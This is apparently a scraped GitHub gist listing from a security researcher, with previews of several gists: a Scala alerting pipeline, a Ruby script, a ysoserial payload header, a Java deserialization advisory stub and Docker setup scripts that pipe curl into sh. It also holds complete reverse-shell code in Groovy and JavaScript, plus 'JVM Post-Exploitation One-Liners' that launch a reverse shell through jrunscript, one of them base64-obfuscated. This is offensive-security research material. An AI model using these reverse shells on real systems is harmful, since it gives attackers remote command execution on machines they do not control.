Chris Frohoff frohoff

## gist:db15cb9244e5a6184ab3
object Test extends App {
  lazy val flow: SplunkEvent => Seq[Email[Alert]] =
      receiveEvent andTap rawTap andThen
      convertToSecurityEvent andMaybeTap eventTap andMaybe
      classifyIfTrained andMaybeTap classificationTap andMaybeSeq
      aggregateByTimeWindow andForEach (_.sortBy(_.event.time)) andForEach
      convertToAlert andForEachTap alertTap andForEachOpt
      createEmail andForEachTap emailTap
}

## mdexec.rb
#!/usr/bin/env ruby

require 'open3'

def replace(md, strip=false)
  rex = /```([a-zA-Z]+)\n(([^`\n]{3,}\n)*)```\s*```mdexec\n([^`\n]{3,}\n)*```/

  replaced = md.gsub(rex) do |rep|
    int, code = $1, $2
    if !strip

## CommonsBeanutilsCollectionsLogging1.java
package ysoserial.payloads;

import java.math.BigInteger;
import java.util.Arrays;
import java.util.PriorityQueue;
import java.util.Queue;

import org.apache.commons.beanutils.BeanComparator;

import ysoserial.payloads.annotation.Dependencies;

## JAVA-ADVISORY.md

      
              1 file
            
          
              9 forks
            
          
              3 comments
            
          
              27 stars
            
          
                frohoff
                / JAVA-ADVISORY.md
            
            
              Last active
              August 28, 2023 19:08
            
              
                Java 7u21 Security Advisory
              
          
    Security Advisory – Java SE

Chris Frohoff – Qualcomm Information Security and Risk Management
Introduction


Affected Product(s): Java SE 6, Java SE 7
Fixed in: Java SE 7u25 (2013-06-18), Java SE 8 (2014-03-18)
Vendor Contact: secalert_us@oracle.com
Vulnerability Type: Unsafe Object Deserialization


## revsh.groovy
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

## revsh.js
var host="localhost";
var port=8044;
var cmd="cmd.exe";
var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();

## JVM_POST_EXPLOIT.md

      
              1 file
            
          
              23 forks
            
          
              2 comments
            
          
              50 stars
            
          
                frohoff
                / JVM_POST_EXPLOIT.md
            
            
              Last active
              December 13, 2023 15:02
            
              
                JVM Post-Exploitation One-Liners
              
          
    Nashorn / Rhino:

Reverse Shell

$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'

Reverse Shell (Base-64 encoded)

$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V

  
## COMMANDMENTS.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                frohoff
                / COMMANDMENTS.md
            
            
              Last active
              May 10, 2016 20:54
            
              
                Commandments
              
          
Thou shalt place time/space/resource constraints on all otherwise open-ended operations

eg: timeouts, result counts, input sizes


Thou shalt strive to measure any quantitive values that can vary over time or across samples

eg: response times/counts, error counts,


Thou shalt not accept, store, transmit, or display a numerical value without its respective units or context
eg: timezones, metric/binary prefixes


## aws-docker-compose-up.sh
#!/bin/bash -xe

yum update -y
yum install -y git

curl -s https://get.docker.com | sh
service docker start
chkconfig docker on

pip install -U docker-compose

## ubuntu-docker-compose-up.sh
#!/bin/bash -xe

DEBIAN_FRONTEND=noninteractive apt-get update && apt-get upgrade -y && apt-get -y install git python python-pip

curl -s https://get.docker.com | sh
service docker start

pip install -U docker-compose

mkdir /opt/docker.d
	object Test extends App {
	lazy val flow: SplunkEvent => Seq[Email[Alert]] =
	receiveEvent andTap rawTap andThen
	convertToSecurityEvent andMaybeTap eventTap andMaybe
	classifyIfTrained andMaybeTap classificationTap andMaybeSeq
	aggregateByTimeWindow andForEach (_.sortBy(_.event.time)) andForEach
	convertToAlert andForEachTap alertTap andForEachOpt
	createEmail andForEachTap emailTap
	}
	#!/usr/bin/env ruby

	require 'open3'

	def replace(md, strip=false)
	rex = /```([a-zA-Z]+)\n(([^`\n]{3,}\n))```\s```mdexec\n([^`\n]{3,}\n)*```/

	replaced = md.gsub(rex) do \|rep\|
	int, code = $1, $2
	if !strip
	package ysoserial.payloads;

	import java.math.BigInteger;
	import java.util.Arrays;
	import java.util.PriorityQueue;
	import java.util.Queue;

	import org.apache.commons.beanutils.BeanComparator;

	import ysoserial.payloads.annotation.Dependencies;
	String host="localhost";
	int port=8044;
	String cmd="cmd.exe";
	Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
	var host="localhost";
	var port=8044;
	var cmd="cmd.exe";
	var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();
	#!/bin/bash -xe

	yum update -y
	yum install -y git

	curl -s https://get.docker.com \| sh
	service docker start
	chkconfig docker on

	pip install -U docker-compose
	#!/bin/bash -xe

	DEBIAN_FRONTEND=noninteractive apt-get update && apt-get upgrade -y && apt-get -y install git python python-pip

	curl -s https://get.docker.com \| sh
	service docker start

	pip install -U docker-compose

	mkdir /opt/docker.d